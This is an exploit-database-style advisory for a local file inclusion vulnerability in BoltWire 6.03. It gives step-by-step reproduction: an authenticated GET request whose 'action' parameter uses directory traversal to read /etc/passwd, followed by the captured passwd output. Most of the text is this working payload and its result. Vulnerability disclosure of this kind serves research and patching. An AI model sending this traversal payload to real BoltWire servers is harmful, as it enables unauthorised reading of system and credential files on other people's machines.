# Exploit Title: BoltWire 6.03 - Local File Inclusion # Date: 2020-05-02 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://www.boltwire.com/ # Software Link: https://www.boltwire.com/downloads/go&v=6&r=03 # Version: 6.03 # Tested on: Ubuntu 20.04 LAMP LFI: Steps to Reproduce: 1) Using an HTTP GET request, browse to the following page while authenticated as a user. http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd Result root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin [SNIPPED]